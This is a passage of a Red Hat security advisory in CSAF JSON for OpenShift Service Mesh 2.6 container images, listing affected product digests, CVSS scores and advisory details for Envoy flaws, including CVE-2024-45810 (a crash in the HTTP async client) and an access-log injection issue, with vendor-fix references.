"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Malicious log injection via access logs"
},
{
"cve": "CVE-2024-45810",
"cwe": {
"id": "CWE-119",
"name": "Improper Restriction of Operations within the Bounds of a Memory Buffer"
},
"discovery_date": "2024-09-20T00:40:31.483825+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313687"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy. Envoy will crash when the http async client is handling `sendLocalReply` under some circumstances, such as websocket upgrade and requests mirroring. The http async client will crash during the `sendLocalReply()` in http async client if the http async client is duplicating the status code or if the destruction of the router is called at the destructor of the async stream while the stream is deferred or deleted. This issue occurs when the stream decoder is destroyed but it\u0027s reference is called in `router.onDestroy()`, causing a segment fault. This will impact ext_authz if the `upgrade` and `connection` header are allowed.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Envoy crashes for `LocalReply` in HTTP async client",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability in Envoy related to the HTTP async client crashing during `sendLocalReply()` is classified as moderate severity rather than important due to the crash is contingent on particular scenarios, such as websocket upgrades and request mirroring, which may not be common in all deployments. Additionally, while the segmentation fault can disrupt service, it does not compromise data integrity or expose sensitive information.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45810"
},
{
"category": "external",
"summary": "RHBZ#2313687",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313687"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45810",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45810"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45810",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45810"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q"
}
],
"release_date": "2024-09-20T00:15:03.153000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
